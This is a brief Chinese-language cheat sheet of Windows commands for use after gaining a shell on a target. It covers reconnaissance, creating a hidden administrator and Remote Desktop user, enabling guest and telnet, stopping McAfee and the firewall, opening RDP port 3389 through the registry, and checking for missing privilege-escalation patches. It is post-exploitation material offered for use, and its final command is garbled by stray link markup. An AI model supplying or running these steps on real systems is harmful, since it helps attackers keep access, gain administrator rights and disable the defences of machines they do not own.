拿下shell后提權命令

分享常用的DOS命令：
查看版本：ver
查看權限：whoami
查看配置：systeminfo
查看用戶：net user
查看進程：tasklist
查看正在運行的服務：tasklist /svc
查看開放的所有端口：netstat -ano
查詢管理用戶名：query user
查看搭建環境：ftp 127.0.0.1
查看指定服務的路徑：sc qc Mysql
添加一個用戶：net user feizhu admin /add
將添加的用戶提升到管理權限：net localgroup administrators feizhu /add
添加用戶並提升權限：net user feizhu admin /add & net localgroup administrators feizhu /add
查看制定用戶信息：net user feizhu
查看所有管理權限的用戶：net localgroup administrators
加入遠程桌面用戶組：net localgroup “Remote Desktop Users” feizhu /add
突破最大連接數：mstsc /admin /v:127.0.0.1
刪除用戶：net user feizhu /del
刪除管理員賬戶:net user administrator feizhu /del
更改系統登陸密碼：net user feizhu feizhu... 修改feizhu用戶密碼為feizhu...
激活GUEST用戶：net user guest /active:yes
開啟TELNET服務：net start telnet
關閉麥咖啡：net stop “McAfee McShield”
關閉防火牆：net stop sharedaccess
查看當前目錄的所有文件：dir c:\windows\
查看制定文件的內容：type c:\windows\1.asp
把cmd.exe復制到c:\windows的temp目錄下並命名為cmd.txt：copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
開3389端口的命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看補丁：dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo] (mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt